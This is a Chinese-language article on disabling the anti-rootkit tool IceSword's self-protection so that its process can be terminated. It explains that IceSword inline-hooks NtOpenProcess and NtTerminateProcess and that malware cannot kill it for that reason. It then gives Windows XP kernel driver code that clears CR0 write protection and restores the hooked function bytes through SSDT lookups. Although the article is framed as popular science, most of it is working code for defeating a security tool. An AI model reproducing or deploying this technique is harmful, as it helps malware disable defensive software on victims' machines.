突破IceSword自身进程保护的方法

　　IceSword的驱动对其自身进程做了保护，使恶意程序终止不了他。IceSword没有用HOOK SSDT的方法，不过也没用什么太变态的方法，而是Inline Hook了NtOpenProcess、NtTerminateProcess几个函数，即修改函数前5个字节，jmp到他自定义处理函数例程里。

　　终止采用这类保护方法的进程，可以使用暴力的PspTerminateProcess方法，PspTerminateProcess函数未导出，需要我们自己穷举特征码搜索来定位，或者硬编码之。当然，我们还可以恢复IceSword的Inline hook，还原被IceSword挂钩过的NtOpenProcess、NtTerminateProcess函数，然后在用户态上使用普通的终止进程的方法就可以终止他了。这里给出了第二中方法的具体代码，不过由于此篇文章出于科普目的，代码就写得马虎点了，仅适用于Windows XP，因为取SSDT对应的函数索引号用的硬编码，说明问题而已。NtTerminateProcess未导出，大家可以自己改成通过读取ntdll.dll动态通用的获得索引号的方法，方法网上有公开，需要的人就自己动点手吧。

　　CODE:

　　#include

　　#define DWORD unsigned long

　　unsigned char OldCode[5]="\x68\xc4\x00\x00\x00";

　　unsigned char OldCode2[5]="\x8b\xff\x55\x8b\xec";

　　#pragma pack(1)

　　typedef struct ServiceDescriptorEntry {

　　unsigned int *ServiceTableBase;

　　unsigned int *ServiceCounterTableBase;

　　unsigned int NumberOfServices;

　　unsigned char *ParamTableBase;

　　} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;

　　#pragma pack()

　　__declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable;

　　NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING

　　theRegistryPath )

　　{

　　DWORD OpAddr,OpAddr2;

　　OpAddr=*(KeServiceDescriptorTable.ServiceTableBase + 0x7A);

　　OpAddr2=*(KeServiceDescriptorTable.ServiceTableBase + 0x101);

　　_asm

　　{

　　CLI

　　MOV eax, CR0

　　AND eax, NOT 10000H

　　MOV CR0, eax

　　pushad

　　mov edi, OpAddr

　　mov eax, dword ptr OldCode[0]

　　mov [edi], eax

　　mov al, byte ptr OldCode[4]

　　mov [edi+4], al

　　mov edi, OpAddr2

　　mov eax, dword ptr OldCode2[0]

　　mov [edi], eax

　　mov al, byte ptr OldCode2[4]

　　mov [edi+4], al

　　popad

　　MOV eax, CR0

　　OR eax, 10000H

　　MOV CR0, eax

　　STI

　　}

　　return STATUS_SUCCESS;

　　}